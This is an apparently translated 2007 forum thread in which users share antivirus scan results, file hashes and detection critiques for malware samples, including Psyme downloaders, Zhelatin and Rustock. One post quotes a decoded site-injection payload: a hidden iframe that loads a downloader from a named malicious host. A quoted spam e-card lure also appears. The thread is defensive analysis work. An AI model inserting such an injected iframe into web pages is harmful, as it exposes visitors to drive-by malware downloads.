-
from the thread [url]http://virusinfo.info/showthread.php?t=11088[/url]
patched [B]ntoskrnl.exe[/B]
[QUOTE]AhnLab-V3 2007.7.14.0 2007.07.17 no virus found
AntiVir 7.4.0.42 2007.07.17 no virus found
Authentium 4.93.8 2007.07.18 no virus found
Avast 4.7.997.0 2007.07.17 no virus found
AVG 7.5.0.476 2007.07.17 no virus found
BitDefender 7.2 2007.07.17 no virus found
CAT-QuickHeal 9.00 2007.07.17 no virus found
ClamAV devel-20070416 2007.07.17 no virus found
DrWeb 4.33 2007.07.18 no virus found
[B]eSafe 7.0.15.0 2007.07.17 Suspicious Trojan/Worm[/B]
eTrust-Vet 30.8.3790 2007.07.17 no virus found
Ewido 4.0 2007.07.17 no virus found
FileAdvisor 1 2007.07.18 no virus found
Fortinet 2.91.0.0 2007.07.17 no virus found
F-Prot 4.3.2.48 2007.07.17 no virus found
F-Secure 6.70.13030.0 2007.07.17 no virus found
Ikarus T3.1.1.8 2007.07.17 no virus found
[B]Kaspersky 4.0.2.24 2007.07.18 Virus.Win32.Sosisko.a[/B]
McAfee 5076 2007.07.17 no virus found
Microsoft 1.2704 2007.07.17 no virus found
NOD32v2 2404 2007.07.17 no virus found
Norman 5.80.02 2007.07.17 no virus found
Panda 9.0.0.4 2007.07.17 no virus found
Sophos 4.19.0 2007.07.17 no virus found
[B]Sunbelt 2.2.907.0 2007.07.18 VIPRE.Suspicious[/B]
Symantec 10 2007.07.18 no virus found
TheHacker 6.1.7.148 2007.07.16 no virus found
[B]VBA32 3.12.2 2007.07.17 suspected of Embedded.SpamTool.Win32.Agent.u[/B]
VirusBuster 4.3.23:9 2007.07.17 no virus found
[B]Webwasher-Gateway 6.0.1 2007.07.17 Win32.Malware.gen!90 (suspicious)[/B][/QUOTE]
-
File index.rar received on 07.18.2007 08:11:48 (CET)
Current status: finished
Antivirus Version Last Update Result
AhnLab-V3 2007.7.18.0 2007.07.18 no virus found
[B]AntiVir 7.4.0.42 2007.07.17 EXP/VML-Fill.A[/B]
Authentium 4.93.8 2007.07.18 no virus found
Avast 4.7.997.0 2007.07.17 no virus found
AVG 7.5.0.476 2007.07.17 no virus found
BitDefender 7.2 2007.07.17 no virus found
CAT-QuickHeal 9.00 2007.07.17 no virus found
ClamAV devel-20070416 2007.07.18 no virus found
[B]DrWeb 4.33 2007.07.18 VBS.PackFor[/B]
eSafe 7.0.15.0 2007.07.17 no virus found
eTrust-Vet 30.8.3790 2007.07.17 no virus found
Ewido 4.0 2007.07.17 no virus found
FileAdvisor 1 2007.07.18 no virus found
[B]Fortinet 2.91.0.0 2007.07.18 JS/WebAttacker!exploit[/B]
F-Prot 4.3.2.48 2007.07.17 no virus found
[B]F-Secure 6.70.13030.0 2007.07.17 Trojan-Downloader.JS.Psyme.hu
Ikarus T3.1.1.8 2007.07.18 Trojan-Downloader.JS.Psyme.hu
Kaspersky 4.0.2.24 2007.07.18 Trojan-Downloader.JS.Psyme.hu
McAfee 5076 2007.07.17 JS/Downloader-AUD
Microsoft 1.2704 2007.07.17 TrojanDownloader:JS/Psyme.gen[/B]
NOD32v2 2404 2007.07.17 no virus found
Norman 5.80.02 2007.07.17 no virus found
Panda 9.0.0.4 2007.07.17 no virus found
[B]Sophos 4.19.0 2007.07.17 Mal/ObfJS-A[/B]
Sunbelt 2.2.907.0 2007.07.18 no virus found
Symantec 10 2007.07.18 no virus found
[B]TheHacker 6.1.7.148 2007.07.16 Trojan/Downloader.vbs[/B]
VBA32 3.12.2 2007.07.17 no virus found
[B]VirusBuster 4.3.23:9 2007.07.17 JS.Psyme.DD.Gen
Webwasher-Gateway 6.0.1 2007.07.17 Exploit.VML-Fill.A[/B]
Aditional information
File size: 3905 bytes
MD5: 7d1cc59e55db21e8599ddf9f58851fbc
SHA1: 1b4de7d587522df2325bbb1178150a2d0b6ff143
-
Continuation of the previous one:
zhestclub. ru
File zhestclub.htm received on 07.18.2007 10:12:25 (CET)
Current status: Loading ... finished
Antivirus Version Last Update Result
AhnLab-V3 2007.7.18.0 2007.07.18 no virus found
AntiVir 7.4.0.42 2007.07.18 no virus found
Authentium 4.93.8 2007.07.18 no virus found
Avast 4.7.997.0 2007.07.17 no virus found
AVG 7.5.0.476 2007.07.17 no virus found
BitDefender 7.2 2007.07.17 no virus found
CAT-QuickHeal 9.00 2007.07.17 no virus found
ClamAV devel-20070416 2007.07.18 no virus found
[B]DrWeb 4.33 2007.07.18 VBS.PackFor[/B]
eSafe 7.0.15.0 2007.07.17 no virus found
eTrust-Vet 30.8.3790 2007.07.17 no virus found
Ewido 4.0 2007.07.17 no virus found
FileAdvisor 1 2007.07.18 no virus found
Fortinet 2.91.0.0 2007.07.18 no virus found
F-Prot 4.3.2.48 2007.07.17 no virus found
F-Secure 6.70.13030.0 2007.07.17 no virus found
Ikarus T3.1.1.8 2007.07.18 no virus found
Kaspersky 4.0.2.24 2007.07.18 no virus found
McAfee 5076 2007.07.17 no virus found
[B]Microsoft 1.2704 2007.07.18 TrojanDownloader:JS/Psyme.gen[/B]
NOD32v2 2404 2007.07.17 no virus found
Norman 5.80.02 2007.07.17 no virus found
Panda 9.0.0.4 2007.07.17 no virus found
[B]Sophos 4.19.0 2007.07.17 Mal/ObfJS-A[/B]
Sunbelt 2.2.907.0 2007.07.18 no virus found
Symantec 10 2007.07.18 no virus found
TheHacker 6.1.7.148 2007.07.16 no virus found
VBA32 3.12.2 2007.07.17 no virus found
[B]VirusBuster 4.3.23:9 2007.07.17 JS.Agent.B[/B]
[B]Webwasher-Gateway 6.0.1 2007.07.18 JavaScript.CodeUnfolding.gen!High (suspicious)[/B]
Aditional information
File size: 8413 bytes
MD5: 38ddab82dcea800e2545ef6f7fe2bc1b
SHA1: c87072b1b9ca09ae540d041d711c5353a1839c29
[size="1"][color="#666686"][B]Added 4 hours 2 minutes later[/B][/color][/size]
From the [URL="http://virusinfo.info/showthread.php?p=123479#post123479"]thread[/URL]
File realfoto.exe received on 07.18.2007 14:07:57 (CET)
Current status: Loading ... finished
Antivirus Version Last Update Result
AhnLab-V3 2007.7.18.0 2007.07.18 no virus found
AntiVir 7.4.0.42 2007.07.18 no virus found
Authentium 4.93.8 2007.07.18 no virus found
[B]Avast 4.7.997.0 2007.07.17 Win32:Small-GYA[/B]
AVG 7.5.0.476 2007.07.17 no virus found
[B]BitDefender 7.2 2007.07.17 Dropped:Trojan.Downloader.Small.AET[/B]
[B]CAT-QuickHeal 9.00 2007.07.17 (Suspicious) - DNAScan[/B]
ClamAV devel-20070416 2007.07.18 no virus found
DrWeb 4.33 2007.07.18 no virus found
eSafe 7.0.15.0 2007.07.17 no virus found
eTrust-Vet 30.8.3791 2007.07.18 no virus found
Ewido 4.0 2007.07.18 no virus found
FileAdvisor 1 2007.07.18 no virus found
Fortinet 2.91.0.0 2007.07.18 no virus found
F-Prot 4.3.2.48 2007.07.17 no virus found
F-Secure 6.70.13030.0 2007.07.18 no virus found
[B]Ikarus T3.1.1.8 2007.07.18 Trojan-Downloader.Win32.Small.ehu[/B]
Kaspersky 4.0.2.24 2007.07.18 no virus found
[B]McAfee 5076 2007.07.17 Generic Downloader[/B]
[B]Microsoft 1.2704 2007.07.18 TrojanDownloader:Win32/Agent.WX[/B]
[B]NOD32v2 2404 2007.07.17 probably a variant of Win32/TrojanDownloader.Small.DRU[/B]
Norman 5.80.02 2007.07.18 no virus found
[B]Panda 9.0.0.4 2007.07.18 Suspicious file[/B]
[B]Sophos 4.19.0 2007.07.17 Mal/Packer[/B]
[B]Sunbelt 2.2.907.0 2007.07.18 VIPRE.Suspicious[/B]
Symantec 10 2007.07.18 no virus found
TheHacker 6.1.7.148 2007.07.16 no virus found
[B]VBA32 3.12.2 2007.07.17 Trojan.Win32.TrojanDownloader.Small.DRU[/B]
VirusBuster 4.3.23:9 2007.07.17
[B]Webwasher-Gateway 6.0.1 2007.07.18 Packer.FSG[/B]
Aditional information
File size: 2625 bytes
MD5: ba0b2e8dc204a4b227a3b106070b76d3
SHA1: 0794eb98b6013c452c6b0a770e7a672005d91b82
packers: FSG
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
-
[quote=icon;123441]Continuation of the previous one:
zhestclub. ru
File zhestclub.htm received on 07.18.2007 10:12:25 (CET)
[B]DrWeb 4.33 2007.07.18 VBS.PackFor[/B]
[/quote]
Allow me to doubt this detection. All that this "malicious script" does is write the following line into the document:
[code]<iframe src='http://bsdpng.info/error/' width=1 height=1 style='visibility: hidden;'></iframe>[/code], that is, it is a launcher for the classic Psyme located at the given address. The script itself is harmless. In essence, we are looking at a classic site injection, and DrWeb has put a mask on the JavaScript packer. Detections like these are more correct (although still incorrect for the VirusInfo statistics):
[quote=icon;123441]
[B]Microsoft 1.2704 2007.07.18 TrojanDownloader:JS/Psyme.gen[/B]
[B]Sophos 4.19.0 2007.07.17 Mal/ObfJS-A[/B]
[B]VirusBuster 4.3.23:9 2007.07.17 JS.Agent.B[/B]
[B]Webwasher-Gateway 6.0.1 2007.07.18 JavaScript.CodeUnfolding.gen!High (suspicious)[/B]
[/quote]
-
[QUOTE]File ecard.exe received on 07.19.2007 21:15:51 (CET)
Current status: finished
Antivirus Version Last Update Result
AhnLab-V3 2007.7.20.0 2007.07.19 no virus found
[B]AntiVir 7.4.0.44 2007.07.19 WORM/Zhelatin.Gen[/B]
Authentium 4.93.8 2007.07.19 no virus found
[B]Avast 4.7.997.0 2007.07.19 Win32:Tibs-BBG[/B]
AVG 7.5.0.476 2007.07.19 no virus found
[B]BitDefender 7.2 2007.07.19 Trojan.Peed.IAM
CAT-QuickHeal 9.00 2007.07.19 (Suspicious) - DNAScan[/B]
ClamAV devel-20070416 2007.07.19 no virus found
DrWeb 4.33 2007.07.19 no virus found
[B]eSafe 7.0.15.0 2007.07.19 Suspicious Trojan/Worm[/B]
eTrust-Vet 30.8.3794 2007.07.19 no virus found
Ewido 4.0 2007.07.19 no virus found
FileAdvisor 1 2007.07.19 no virus found
Fortinet 2.91.0.0 2007.07.19 no virus found
F-Prot 4.3.2.48 2007.07.19 no virus found
F-Secure 6.70.13030.0 2007.07.19 no virus found
Ikarus T3.1.1.8 2007.07.19 no virus found
Kaspersky 4.0.2.24 2007.07.19 no virus found
McAfee 5078 2007.07.19 no virus found
[B]Microsoft 1.2704 2007.07.19 Trojan:Win32/Tibs.Q[/B]
NOD32v2 2408 2007.07.19 no virus found
Norman 5.80.02 2007.07.19 no virus found
Panda 9.0.0.4 2007.07.19 no virus found
[B]Sophos 4.19.0 2007.07.17 Mal/Dorf-A[/B]
Sunbelt 2.2.907.0 2007.07.19 no virus found
[B]Symantec 10 2007.07.19 Trojan.Packed.13[/B]
TheHacker 6.1.7.149 2007.07.18 no virus found
VBA32 3.12.2.1 2007.07.19 no virus found
VirusBuster 4.3.26:9 2007.07.19 no virus found
[B]Webwasher-Gateway 6.0.1 2007.07.19 Worm.Zhelatin.Gen[/B]
Aditional information
File size: 139173 bytes
MD5: 765922b7967bc7b832a2a4c89dce3068
SHA1: b57ce29554bb404c236fc864cf586ca582f967fb[/QUOTE]
The latest build of KIS 7 does not detect it either in maximum heuristics mode, although just a couple of days ago files from similar emails were caught as [B]trojan.generic[/B]
And 5-10 emails of this kind arrive every day:
[QUOTE]Hi. School mate has sent you a greeting ecard.
See your card as often as you wish during the next 15 days.
SEEING YOUR CARD
If your email software creates links to Web pages, click on your card's direct www address below while you are connected to the Internet:
[url]http://72.230.33.160/*****************[/url]
Or copy and paste it into your browser's "Location" box (where Internet addresses go).
We hope you enjoy your awesome card.
Wishing you the best,
Webmaster,
greetingcard.org[/QUOTE]
-
In defense of Microsoft -)
Antivirus Version Last Update Result
AhnLab-V3 2007.7.20.0 2007.07.19 no virus found
[B]AntiVir 7.4.0.44 2007.07.19 WORM/Zhelatin.Gen[/B]
Authentium 4.93.8 2007.07.19 no virus found
[B]Avast 4.7.997.0 2007.07.19 Win32:Tibs-BBG[/B]
AVG 7.5.0.476 2007.07.18 no virus found
[B]BitDefender 7.2 2007.07.19 Trojan.Peed.IAM[/B]
CAT-QuickHeal 9.00 2007.07.19 (Suspicious) - DNAScan
ClamAV devel-20070416 2007.07.19 no virus found
DrWeb 4.33 2007.07.19 no virus found
[B]eSafe 7.0.15.0 2007.07.17 Suspicious Trojan/Worm[/B]
[B]eTrust-Vet 30.8.3794 2007.07.19 Win32/Sintun[/B]
Ewido 4.0 2007.07.19 no virus found
FileAdvisor 1 2007.07.19 no virus found
Fortinet 2.91.0.0 2007.07.19 no virus found
F-Prot 4.3.2.48 2007.07.19 no virus found
F-Secure 6.70.13030.0 2007.07.19 no virus found
Ikarus T3.1.1.8 2007.07.19 no virus found
Kaspersky 4.0.2.24 2007.07.19 no virus found
McAfee 5078 2007.07.19 no virus found
[COLOR=Red][B]Microsoft 1.2704 2007.07.19 TrojanDropper:Win32/Tibs.O[/B][/COLOR]
NOD32v2 2407 2007.07.19 no virus found
Norman 5.80.02 2007.07.19 no virus found
Panda 9.0.0.4 2007.07.19 no virus found
[B]Sophos 4.19.0 2007.07.17 Mal/Dorf-A[/B]
Sunbelt 2.2.907.0 2007.07.19 no virus found
[B]Symantec 10 2007.07.19 Trojan.Packed.13[/B]
TheHacker 6.1.7.149 2007.07.18 no virus found
VBA32 3.12.2.1 2007.07.19 no virus found
VirusBuster 4.3.26:9 2007.07.19 no virus found
[B]Webwasher-Gateway 6.0.1 2007.07.19 Worm.Zhelatin.Gen[/B]
-
caught it by hand in \system32\drivers
File firelm01.sys received on 07.21.2007 11:37:32 (CET)
Antivirus Version Last Update Result
AhnLab-V3 2007.7.21.0 2007.07.20 no virus found
AntiVir 7.4.0.44 2007.07.20 no virus found
Authentium 4.93.8 2007.07.20 no virus found
Avast 4.7.997.0 2007.07.20 no virus found
AVG 7.5.0.476 2007.07.20 no virus found
BitDefender 7.2 2007.07.21 no virus found
CAT-QuickHeal 9.00 2007.07.20 no virus found
ClamAV devel-20070416 2007.07.21 no virus found
DrWeb 4.33 2007.07.21 no virus found
eSafe 7.0.15.0 2007.07.19 no virus found
eTrust-Vet 30.8.3797 2007.07.20 no virus found
Ewido 4.0 2007.07.21 no virus found
FileAdvisor 1 2007.07.21 no virus found
Fortinet 2.91.0.0 2007.07.21 no virus found
F-Prot 4.3.2.48 2007.07.20 no virus found
F-Secure 6.70.13030.0 2007.07.20 no virus found
Ikarus T3.1.1.8 2007.07.21 no virus found
[B]Kaspersky 4.0.2.24 2007.07.21 Backdoor.Win32.Hackdoor.g[/B]
McAfee 5079 2007.07.20 no virus found
Microsoft 1.2704 2007.07.21 no virus found
NOD32v2 2410 2007.07.20 no virus found
Norman 5.80.02 2007.07.20 no virus found
Panda 9.0.0.4 2007.07.20 no virus found
Sophos 4.19.0 2007.07.17 no virus found
Sunbelt 2.2.907.0 2007.07.21 no virus found
Symantec 10 2007.07.21 no virus found
TheHacker 6.1.7.150 2007.07.21 no virus found
VBA32 3.12.2.1 2007.07.21 no virus found
VirusBuster 4.3.26:9 2007.07.20 no virus found
Webwasher-Gateway 6.0.1 2007.07.21 no virus found
Additional information
File size: 32855 bytes
MD5: 98638f2f168f5856d11083c1f5843ba2
SHA1: 9cc547244ffaf8c4a1d43abdd2a742f47c8295cd
add:[QUOTE]my post [url]http://virusinfo.info/showpost.php?p...&postcount=227[/url]
an error by a Kaspersky Lab virus analyst (I sent it to the virus lab and got a reply that new malicious software had been found), but this is a firewall component [/QUOTE]
-
File avz00001.dta received on 07.21.2007 13:12:23 (CET)[QUOTE]AhnLab-V3 2007.7.21.0 2007.07.20 no virus found
AntiVir 7.4.0.44 2007.07.20 no virus found
Authentium 4.93.8 2007.07.20 no virus found
Avast 4.7.997.0 2007.07.20 no virus found
AVG 7.5.0.476 2007.07.20 no virus found
[B]BitDefender 7.2 2007.07.21 Trojan.Rootkit.Loader.A[/B]
CAT-QuickHeal 9.00 2007.07.20 no virus found
ClamAV devel-20070416 2007.07.21 no virus found
DrWeb 4.33 2007.07.21 no virus found
eSafe 7.0.15.0 2007.07.19 no virus found
[B]eTrust-Vet 30.8.3797 2007.07.20 Win32/Higlieder.AI[/B]
Ewido 4.0 2007.07.21 no virus found
FileAdvisor 1 2007.07.21 no virus found
Fortinet 2.91.0.0 2007.07.21 no virus found
F-Prot 4.3.2.48 2007.07.20 no virus found
F-Secure 6.70.13030.0 2007.07.20 no virus found
[B]Ikarus T3.1.1.8 2007.07.21 Trojan.Rootkit.Loader.A[/B]
Kaspersky 4.0.2.24 2007.07.21 no virus found
McAfee 5079 2007.07.20 no virus found
[B]Microsoft 1.2704 2007.07.21 VirTool:WinNT/Higlieder.E
NOD32v2 2410 2007.07.20 Win32/Bagle.IX[/B]
Norman 5.80.02 2007.07.20 no virus found
Panda 9.0.0.4 2007.07.20 no virus found
Sophos 4.19.0 2007.07.17 no virus found
[B]Sunbelt 2.2.907.0 2007.07.21 VIPRE.Suspicious[/B]
Symantec 10 2007.07.21 no virus found
TheHacker 6.1.7.150 2007.07.21 no virus found
VBA32 3.12.2.1 2007.07.21 no virus found
VirusBuster 4.3.26:9 2007.07.20 no virus found
[B]Webwasher-Gateway 6.0.1 2007.07.21 Win32.Malware.gen (suspicious)[/B][/QUOTE]
-
File bcqr00001.dat received on 07.21.2007 21:25:06 (CET)
[QUOTE]Antivirus Version Last Update Result
AhnLab-V3 2007.7.21.0 2007.07.20 no virus found
AntiVir 7.4.0.44 2007.07.21 no virus found
Authentium 4.93.8 2007.07.20 no virus found
Avast 4.7.997.0 2007.07.20 no virus found
AVG 7.5.0.476 2007.07.21 no virus found
BitDefender 7.2 2007.07.21 no virus found
CAT-QuickHeal 9.00 2007.07.20 no virus found
ClamAV devel-20070416 2007.07.21 no virus found
DrWeb 4.33 2007.07.21 no virus found
eSafe 7.0.15.0 2007.07.19 no virus found
eTrust-Vet 30.8.3797 2007.07.20 no virus found
Ewido 4.0 2007.07.21 no virus found
FileAdvisor 1 2007.07.21 no virus found
[B][COLOR="Red"][COLOR="Red"]Fortinet 2.91.0.0 2007.07.21 RKRustok.A[/COLOR][/COLOR][/B]
F-Prot 4.3.2.48 2007.07.20 no virus found
F-Secure 6.70.13030.0 2007.07.21 no virus found
Ikarus T3.1.1.8 2007.07.21 no virus found
Kaspersky 4.0.2.24 2007.07.21 no virus found
McAfee 5079 2007.07.20 no virus found
[COLOR="Red"][B]Microsoft 1.2704 2007.07.21 Trojan:Win32/Rustock.gen!C[/B][/COLOR]
NOD32v2 2411 2007.07.21 no virus found
Norman 5.80.02 2007.07.20 no virus found
[COLOR="Red"][B]Panda 9.0.0.4 2007.07.21 Rootkit/NetFrame
Sophos 4.19.0 2007.07.17 Mal/RKRustok-A
Sunbelt 2.2.907.0 2007.07.21 Backdoor.Rustock[/B][/COLOR]
Symantec 10 2007.07.21 no virus found
TheHacker 6.1.7.150 2007.07.21 no virus found
VBA32 3.12.2.1 2007.07.21 no virus found
VirusBuster 4.3.26:9 2007.07.21 no virus found
[B][COLOR="Red"]Webwasher-Gateway 6.0.1 2007.07.21 Win32.Malware.gen!82 [/COLOR][/B](suspicious)
[/QUOTE]
Additional information
File size: 61114 bytes
MD5: 8c1d95da9e9085b8c2b13556b3dd95d3
SHA1: 28a2dce0dfd8355c5f011c6c0ab03e2df1bb896e
Sunbelt info: Backdoor.Rustock is a threat that acts as a hidden proxy and enables an attacker to send spam from the machine.
[size="1"][color="#666686"][B]Added 3 hours 21 minutes later[/B][/color][/size]
File avz00002.dta received on 07.22.2007 00:45:31 (CET)
[QUOTE]Antivirus Version Last Update Result
AhnLab-V3 2007.7.21.0 2007.07.20 no virus found
[COLOR="Red"][B]AntiVir 7.4.0.44 2007.07.21 TR/Rootkit.Gen[/B][/COLOR]
Authentium 4.93.8 2007.07.20 no virus found
[COLOR="Red"][B]Avast 4.7.997.0 2007.07.20 Win32:Trojan-gen. {Other}[/B][/COLOR]
AVG 7.5.0.476 2007.07.21 no virus found
[COLOR="Red"][B]BitDefender 7.2 2007.07.21 Backdoor.Rustock.B[/B][/COLOR]
CAT-QuickHeal 9.00 2007.07.20 no virus found
ClamAV devel-20070416 2007.07.22 no virus found
DrWeb 4.33 2007.07.21 no virus found
[COLOR="Red"][B]eSafe 7.0.15.0 2007.07.19 Win32.Rustock.B[/B][/COLOR]
eTrust-Vet 30.8.3797 2007.07.20 no virus found
[COLOR="Red"][B]Ewido 4.0 2007.07.21 Rootkit.Small[/B][/COLOR]
FileAdvisor 1 2007.07.22 no virus found
[COLOR="Red"][B]Fortinet 2.91.0.0 2007.07.21 W32/RUSTOCK.AM!tr.bdr[/B][/COLOR]
F-Prot 4.3.2.48 2007.07.20 no virus found
F-Secure 6.70.13030.0 2007.07.21 no virus found
[COLOR="Red"][B]Ikarus T3.1.1.8 2007.07.21 Backdoor.Rustock.B[/B][/COLOR]
Kaspersky 4.0.2.24 2007.07.22 no virus found
[B][COLOR="Red"]McAfee 5079 2007.07.20 Spam-Mailbot.c!Rootkit
Microsoft 1.2704 2007.07.21 Trojan:Win32/Rustock[/COLOR][/B]
NOD32v2 2411 2007.07.21 no virus found
Norman 5.80.02 2007.07.20 no virus found
[COLOR="Red"][B]Panda 9.0.0.4 2007.07.22 Trj/Clicker.WM
Sophos 4.19.0 2007.07.17 Mal/RKRustok-A
Sunbelt 2.2.907.0 2007.07.21 Backdoor.Rustock
Symantec 10 2007.07.22 Backdoor.Rustock.B[/B][/COLOR]
TheHacker 6.1.7.150 2007.07.21 no virus found
VBA32 3.12.2.1 2007.07.21 no virus found
VirusBuster 4.3.26:9 2007.07.21 no virus found
[B][COLOR="Red"]Webwasher-Gateway 6.0.1 2007.07.22 Trojan.Rootkit.Gen[/COLOR][/B][/QUOTE]
Additional information
File size: 80488 bytes
MD5: 95a506f62ce73818fa6e27d1c052b711
SHA1: 6d880bc775e46e0a26859003dcfb44b26e076276
Sunbelt info: Backdoor.Rustock is a threat that acts as a hidden proxy and enables an attacker to send spam from the machine.
-
File 1.exe received on 07.22.2007 10:10:16 (CET)
Antivirus Version Last Update Result
AhnLab-V3 2007.7.21.0 2007.07.20 no virus found
[B]AntiVir 7.4.0.44 2007.07.21 HEUR/Malware[/B]
Authentium 4.93.8 2007.07.20 no virus found
[B]Avast 4.7.997.0 2007.07.22 Win32:Delf-CAT[/B]
AVG 7.5.0.476 2007.07.21 no virus found
BitDefender 7.2 2007.07.22 no virus found
[B]CAT-QuickHeal 9.00 2007.07.20 (Suspicious) - DNAScan[/B]
ClamAV devel-20070416 2007.07.22 no virus found
DrWeb 4.33 2007.07.21 no virus found
eSafe 7.0.15.0 2007.07.19 no virus found
eTrust-Vet 30.8.3797 2007.07.20 no virus found
Ewido 4.0 2007.07.21 no virus found
FileAdvisor 1 2007.07.22 no virus found
Fortinet 2.91.0.0 2007.07.22 no virus found
F-Prot 4.3.2.48 2007.07.20 no virus found
F-Secure 6.70.13030.0 2007.07.21 no virus found
[B]Ikarus T3.1.1.8 2007.07.22 Trojan-PWS.Win32.Kapod[/B]
Kaspersky 4.0.2.24 2007.07.22 no virus found
McAfee 5079 2007.07.20 no virus found
Microsoft 1.2704 2007.07.22 no virus found
NOD32v2 2411 2007.07.21 no virus found
Norman 5.80.02 2007.07.20 no virus found
[B]Panda 9.0.0.4 2007.07.22 Suspicious file[/B]
Sophos 4.19.0 2007.07.17 no virus found
[B]Sunbelt 2.2.907.0 2007.07.21 VIPRE.Suspicious[/B]
Symantec 10 2007.07.22 no virus found
TheHacker 6.1.7.150 2007.07.21 no virus found
VBA32 3.12.2.1 2007.07.21 no virus found
VirusBuster 4.3.26:9 2007.07.21 no virus found
[B]Webwasher-Gateway 6.0.1 2007.07.22 Heuristic.Malware[/B]
Additional information
File size: 264192 bytes
MD5: 849f0a1fcbfc7752368131947228790d
SHA1: 33d8313e504f36cbd8a45ea1de5a92d50b95c37f
packers: ASProtect
packers: PE_Patch, Aspack
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
-
Antivirus Version Last Update Result
AhnLab-V3 2007.7.25.0 2007.07.24 no virus found
AntiVir 7.4.0.44 2007.07.24 no virus found
Authentium 4.93.8 2007.07.25 no virus found
[B]Avast 4.7.997.0 2007.07.25 Win32:Trojan-gen. {Other}
AVG 7.5.0.476 2007.07.25 Downloader.Zlob.HN
BitDefender 7.2 2007.07.25 Trojan.Downloader.Zlob.AAEE [/B]
CAT-QuickHeal 9.00 2007.07.24 no virus found
ClamAV devel-20070416 2007.07.25 no virus found
DrWeb 4.33 2007.07.25 no virus found
eSafe 7.0.15.0 2007.07.24 no virus found
eTrust-Vet 31.1.5003 2007.07.24 no virus found
Ewido 4.0 2007.07.24 no virus found
FileAdvisor 1 2007.07.25 no virus found
Fortinet 2.91.0.0 2007.07.25 no virus found
F-Prot 4.3.2.48 2007.07.25 no virus found
[B]F-Secure 6.70.13030.0 2007.07.25 Trojan-Downloader.Win32.Zlob.bxn [/B]
Ikarus T3.1.1.8 2007.07.24 no virus found
[B]Kaspersky 4.0.2.24 2007.07.25 Trojan-Downloader.Win32.Zlob.bxn [/B]
McAfee 5081 2007.07.24 no virus found
[B]Microsoft 1.2704 2007.07.25 TrojanDownloader:Win32/Zlob[/B]
NOD32v2 2418 2007.07.25 no virus found
[B]Norman 5.80.02 2007.07.24 DNSChanger.gen10[/B]
Panda 9.0.0.4 2007.07.24 no virus found
[B]Sophos 4.19.0 2007.07.17 Mal/Zlob-A [/B]
Sunbelt 2.2.907.0 2007.07.25 no virus found
Symantec 10 2007.07.25 no virus found
TheHacker 6.1.7.152 2007.07.23 no virus found
VBA32 3.12.2.1 2007.07.24 no virus found
VirusBuster 4.3.26:9 2007.07.24 no virus found
Webwasher-Gateway 6.0.1 2007.07.25 no virus found
[size="1"][color="#666686"][B]Added 2 minutes later[/B][/color][/size]
+ the same from the Kaspersky website
Проверенный файл: setup.exe - Инфицирован
setup.exe/stream/Script - в порядке
setup.exe/stream/data0001 - в порядке
setup.exe/stream/data0002 - в порядке
setup.exe/stream/data0003 - в порядке
setup.exe/stream/data0004 - в порядке
setup.exe/stream/data0005 - в порядке
[B]setup.exe/stream/data0006 - инфицирован Trojan-Downloader.Win32.Zlob.bxn[/B]
setup.exe/stream/data0007 - в порядке
setup.exe/stream/data0008 - в порядке
-
File svc.exe received on 07.26.2007 06:25:17 (CET)
[QUOTE]Antivirus Version Last Update Result
AhnLab-V3 2007.7.26.0 2007.07.25 no virus found
[B]AntiVir 7.4.0.50 2007.07.25 HEUR/Crypted[/B]
Authentium 4.93.8 2007.07.25 no virus found
Avast 4.7.997.0 2007.07.26 no virus found
AVG 7.5.0.476 2007.07.25 no virus found
BitDefender 7.2 2007.07.26 no virus found
[B]CAT-QuickHeal 9.00 2007.07.25 (Suspicious) - DNAScan[/B]
ClamAV 0.91 2007.07.26 no virus found
DrWeb 4.33 2007.07.26 no virus found
[B]eSafe 7.0.15.0 2007.07.24 Suspicious Trojan/Worm[/B]
eTrust-Vet 31.1.5004 2007.07.25 no virus found
Ewido 4.0 2007.07.25 no virus found
FileAdvisor 1 2007.07.26 no virus found
Fortinet 2.91.0.0 2007.07.26 no virus found
F-Prot 4.3.2.48 2007.07.25 no virus found
F-Secure 6.70.13030.0 2007.07.26 no virus found
Ikarus T3.1.1.8 2007.07.25 no virus found
Kaspersky 4.0.2.24 2007.07.26 no virus found
McAfee 5083 2007.07.26 no virus found
Microsoft 1.2704 2007.07.25 no virus found
NOD32v2 2421 2007.07.26 no virus found
Norman 5.80.02 2007.07.25 no virus found
Panda 9.0.0.4 2007.07.26 Suspicious file
Sophos 4.19.0 2007.07.17 no virus found
Sunbelt 2.2.907.0 2007.07.26 no virus found
Symantec 10 2007.07.26 no virus found
TheHacker 6.1.7.153 2007.07.25 no virus found
[B]VBA32 3.12.2.1 2007.07.24 suspected of Embedded.Trojan-Downloader.Win32.Small.dge[/B]
VirusBuster 4.3.26:9 2007.07.25 no virus found
[B]Webwasher-Gateway 6.0.1 2007.07.26 Win32.NewMalware.BA!4538!2[/B][/QUOTE]
Additional information
File size: 4538 bytes
MD5: a5da3a9c3b0e2b5034b3ec49cbb3a60f
SHA1: 2dca577caf641a2b4e3972902b65b7b1342fab34
-
[url]http://virusinfo.info/showthread.php?t=11350[/url]
[QUOTE]
Antivirus Version Last Update Result
AhnLab-V3 2007.7.27.0 2007.07.26 -
AntiVir 7.4.0.50 2007.07.26 -
Authentium 4.93.8 2007.07.25 -
Avast 4.7.997.0 2007.07.26 -
AVG 7.5.0.476 2007.07.26 PSW.Generic4.ZKV
BitDefender 7.2 2007.07.26 MemScan:Trojan.Spy.Nuklus.D
CAT-QuickHeal 9.00 2007.07.25 -
ClamAV 0.91 2007.07.26 -
DrWeb 4.33 2007.07.26 -
eSafe 7.0.15.0 2007.07.24 suspicious Trojan/Worm
eTrust-Vet 31.1.5004 2007.07.25 -
Ewido 4.0 2007.07.26 -
FileAdvisor 1 2007.07.26 -
Fortinet 2.91.0.0 2007.07.26 -
F-Prot 4.3.2.48 2007.07.25 -
F-Secure 6.70.13030.0 2007.07.26 -
Ikarus T3.1.1.8 2007.07.26 -
Kaspersky 4.0.2.24 2007.07.26 -
McAfee 5083 2007.07.26 -
Microsoft 1.2704 2007.07.26 VirTool:Win32/Obfuscator.C
NOD32v2 2423 2007.07.26 a variant of Win32/Spy.Nuklus
Norman 5.80.02 2007.07.26 -
Panda 9.0.0.4 2007.07.26 Suspicious file
Rising 19.33.32.00 2007.07.26 -
Prevx1 V2 2007.07.26 -
Sophos 4.19.0 2007.07.26 -
Sunbelt 2.2.907.0 2007.07.26 VIPRE.Suspicious
Symantec 10 2007.07.26 -
TheHacker 6.1.7.154 2007.07.26 -
